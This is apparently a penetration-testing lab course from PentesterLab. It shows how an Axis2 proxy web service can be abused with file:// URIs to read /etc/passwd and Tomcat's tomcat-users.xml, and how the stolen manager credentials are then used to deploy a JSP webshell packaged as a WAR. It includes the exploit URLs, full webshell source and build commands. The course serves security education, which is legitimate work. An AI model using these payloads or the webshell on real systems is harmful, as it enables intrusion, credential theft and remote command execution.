Professional Documents
Culture Documents
Axis2 and Tomcat Manager
Axis2 and Tomcat Manager
2 4 5
5 6 6
8
8 10
Attacking Axis2
Retrieving information from the WSDL Calling Axis2 services: the easy way Calling Axis2 services: the hard way Java URL class
12
13 15 16 16
19
19 21 22 23
23 25
Conclusion
28
2/28
3/28
Introduction
This course details the exploitation of an issue in an Axis2 Web service and how using this issue it is possible to retrieve arbitrary files. Then using this, we will see how an attacker can retrieve Tomcat users' file to access the Tomcat Manager and gain commands execution on the server.
4/28
5/28
6/28
$ ifconfig eth0 eth0 Link encap:Ethernet HWaddr 52:54:00:12:34:56 inet addr:10.0.2.15 Bcast:10.0.2.255 Mask:255.255.255.0 inet6 addr: fe80::5054:ff:fe12:3456/64 Scope:Link UP BROADCAST RUNNING MULTICAST MTU:1500 Metric:1 RX packets:88 errors:0 dropped:0 overruns:0 frame:0 TX packets:77 errors:0 dropped:0 overruns:0 carrier:0 collisions:0 txqueuelen:1000 RX bytes:10300 (10.0 KiB) TX bytes:10243 (10.0 KiB) Interrupt:11 Base address:0x8000
In this example the IP address is 10.0.2.15. Throughout the training, the hostname vulnerable is used for the vulnerable machine, you can either replace it by the IP address of the machine, or you can just add an entry to your host file with this name and the corresponding IP address. It can be easily done by modifying: on Windows, your C:\Windows\System32\Drivers\etc\hosts file; on Unix/Linux and Mac OS X, your /etc/hosts file. The IP address can change if you restart the system, don't forget to update your hosts file.
7/28
8/28
The Apache and Tomcat servers can be on the same server or on different servers, this can be confusing once you gain commands execution on the Tomcat server and realise that its configuration does not match what you see on the Apache's end. There are two common ways to "proxy" requests from Apache to Tomcat: http_proxy: the requests are forwarded to Tomcat using the HTTP protocol; ajp13: the requests are forwarded to Tomcat using the AJP13 protocol. This configuration is used in this exercise using the Apache module mod_jk. You should look into CVE-2007-0450 and CVE-2007-1860, these vulnerabilities impact old versions of Tomcat/mod_jk and can potentially allow an attacker to gain access to the Tomcat Manager even if it is not directly exposed by Apache. Here, the page's title gives away that Tomcat is involved in this web stack, however the HTTP headers only give information on the Apache server in front of it:
9/28
% telnet vulnerable 80 Connected to vulnerable. Escape character is '^]'. GET / HTTP/1.0 HTTP/1.1 200 OK Date: Wed, 26 Dec 2012 08:48:22 GMT Server: Apache/2.2.16 (Debian) [...]
10/28
11/28
Attacking Axis2
Axis2 is a project from the Apache Foundation, it allows developer to create Web services in C and in Java. By default, Axis2 gets deployed in /axis2/ (when developers use axis2.war), you can easily retrieve a list of the available services by visiting the page http://vulnerable/axis2/services/listServices:
12/28
If we did not know that the server was hosting a Web service using Axis2, we could try to use a directory buster like wfuzz to find out. However, wfuzz's default wordlists don't contain axis2, that is why it is always a good idea to keep your own list with paths of common applications and frameworks.
The Web Services Description Language describes the functionalities offered by a web service. A WSDL description of a web service (XML based) provides the methods that can be called, what parameters they expects and what values they will return. The WSDL information can be accessed by clicking the service's name in the listServices page or directly using the following URL: http://vulnerable/axis2/services/ProxyService?wsdl. You can find a list of methods by searching for the keyword operation in the portType section of the WSDL. In this file, we can see that only one operation is defined (get):
[...] <wsdl:portType name="ProxyServicePortType"> <wsdl:operation name="get"> <wsdl:input message="tns:getRequest" wsaw:Action="urn:get"/> <wsdl:output message="tns:getResponse" wsaw:Action="urn:getResponse"/> </wsdl:operation> </wsdl:portType> [...]
This operation is defined multiple times in the file for each different way to access it. We can see that this get operation uses a tns:getRequest and sends back a tns:getResponse. We are mostly interested by what the need to send to the service.
14/28
Above the operation declaration, we can see that the getRequest used:
<wsdl:message name="getRequest"> <wsdl:part name="parameters" element="ns:get"/> </wsdl:message>
and that this value is declared above in the WSDL file as a parameter named uri and that this parameter is a string:
[...] <xs:element name="get"> <xs:complexType> <xs:sequence> <xs:element minOccurs="0" name="uri" nillable="true" type="xs:string"/> </xs:sequence> </xs:complexType> </xs:element> [...]
Gathering this information is mostly a guess work and will depend on the WSDL file created by a given framework/tool, however we now have everything we need to call the Web service.
Axis2 provides an easy way to call Web services, you just need to follow the pattern http://[WS_URL]/method?parameters. In our example, we can use this to call our Web service: http://vulnerable/axis2/services/ProxyService/get? uri=https://pentesterlab.com/. We can see that the return value is the homepage of the website PentesterLab.
We can see that this Web service uses the URL provided to retrieve content and echoes it back in the response. The easiest way to do that is the URL class in Java. We can probably use the URL class behaviour to get more than just a website content... The URL class can also be used as a port scanner if the developer didn't limit the ports you can have access to. You can try to access http://vulnerable/axis2/services/ProxyService/get? uri=http://localhost:22/ to see what version of OpenSSH is used. The Java URL class is a really handy class that allows a developer to fetch and retrieve content. This class supports the following protocols:
http:// https:// ftp:// file://
...
17/28
The first example is the most common use of this class and often used as a proxy to retrieve resources and bypass the same origin policy. The file:// is less known and allow an attacker to retrieve arbitrary file on the file system (limited by the application server privileges). We can exploit this behaviour to retrieve the /etc/passwd by accessing the following URL http://vulnerable/axis2/services/ProxyService/get? uri=file:///etc/passwd and we can see the content of /etc/passwd in the response:
You should try to setup Apache and Tomcat using mod_jk and try to create a simple Axis2 HelloWorld Web service or an Axis2 Web service that returns the current time. You can check the configuration of Apache, Tomcat and Axis2 on the ISO to get an idea on how to do it.
18/28
19/28
<tomcat-users> <role rolename="manager-gui"/> <user username="tomcat" password="tomcat" roles="tomcat"/> <user username="admin" password="s3cret" roles="manager-gui"/> </tomcat-users>
Debian has its own way of installing most software and tries to put configuration files in /etc. Tomcat installed through Debian's packaging system will follow this rule and the file tomcat-users.xml will be stored in /etc/tomcat6/ (for the current version of Debian stable). We can see here that users have a role, it's a really important part of the Manager application since you will need a user with the role manager (for version before 6.0.30) or manager-gui (for later version) to access the manager and deploy an application. Other "manager" role can also be used but the deployment is more complex. For example, if you login using tomcat with the password tomcat, you will get an HTTP 403 response:
20/28
21/28
22/28
By default on Debian, this file can only read by root and the member of the group tomcat6, but since the directory traversal gives us the same access as the tomcat server, we can read the content of this file. It's possible to retrieve tomcatusers.xml by accessing the following URL: http://vulnerable/axis2/services/ProxyService/get?uri=file:///etc/tomcat6/tomcatusers.xml. You can then retrieve the password of the manager user and access the Tomcat Manager.
Deploying a WebShell
In this section, we are going to see how we can build and deploy a WebShell to gain command execution on the server.
Building a WebShell
To build a WebShell, we will need to write the WebShell and package it as a war file. To write the Webshell, we can either use JSP or Servlet. To keep things simple, we are going to build a JSP Webshell, the following code can be used:
23/28
<FORM METHOD=GET ACTION='index.jsp'> <INPUT name='cmd' type=text> <INPUT type=submit value='Run'> </FORM> <%@ page import="java.io.*" %> <% String cmd = request.getParameter("cmd"); String output = ""; if(cmd != null) { String s = null; try { Process p = Runtime.getRuntime().exec(cmd,null,null); BufferedReader sI = new BufferedReader(new InputStreamReader(p.getInputStream())); while((s = sI.readLine()) != null) { output += s+"</br>"; } } catch (IOException e) { e.printStackTrace(); } } %> <pre><%=output %></pre>
We can now create a directory name webshell and put our file (index.jsp) inside it:
$ mkdir webshell $ cp index.jsp webshell
Now we can build the war file using jar (provide with java):
24/28
$ cd webshell $ jar -cvf ../webshell.war * added manifest adding: index.jsp(in = 579) (out= 351)(deflated 39%)
Our webshell (webshell.war) is now packaged and we can upload it using the Tomcat Manager.
25/28
26/28
You just need to click the link to access it and you can start running arbitrary commands:
27/28
Conclusion
This exercise explained how to get access to an Axis2 Web service and how the Java URL class can be used to retrieve arbitrary files if no checks are performed on the protocol in use. Once you can retrieve arbitrary files, you can target configuration files to gather sensitive information and passwords. Once you have credentials, you can easily access the administration interface of the application server and deploy a custom web application to run arbitrary commands on the system.
28/28